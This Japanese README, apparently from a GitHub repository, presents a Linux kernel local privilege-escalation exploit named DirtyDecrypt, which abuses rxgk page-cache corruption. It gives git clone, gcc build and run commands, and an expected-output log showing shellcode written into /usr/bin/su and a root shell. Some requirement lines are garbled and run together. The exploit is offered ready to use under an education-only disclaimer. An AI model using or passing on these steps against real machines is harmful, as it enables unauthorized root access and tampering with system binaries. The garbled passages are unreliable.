
Linux Kernel のローカル権限昇格 — RXGK ページキャッシュ破損を悪用
DirtyDecrypt (CVE-2026-31635) は、Linux カーネルの rxrpc サブシステム(特に rxgk コンポーネント)における ローカル権限昇格 の脆弱性です。
AES-CBC 復号化中の Copy-on-Write (COW) チェックの欠落を悪用し、非特権ユーザーがページキャッシュを破損させ、任意のファイル書き込み を達成し、root アクセスを得ます。
/etc/passwd を標的に(rootパスワードを空に)CONFIG_RXGK=y)CONFIG_RXGK=n のものCONFIG_RXGK が有効なLinuxカーネルAF_RXRPC ソケットサポートkeyctl ユーティリティ(rxrpcキー用)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
期待される成功出力:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # Main exploit
├── README.md # This file
├── Makefile # Optional
└── exploit.log # Optional output log
AF_RXRPC ソケットと splice() を使用して、ページキャッシュページをRXGK復号パスに強制的に送り込むskb_cow_data() なしでインプレースAES-CBC復号をトリガー/etc/passwd)を1バイトずつ破損このエクスプロイトは教育および許可されたセキュリティテストのみを目的としています。
あなたが所有していないシステムでの不正使用は違法です。
⭐ このリポジトリが役立ったらStarをお願いします!
研究コミュニティのために❤️を込めて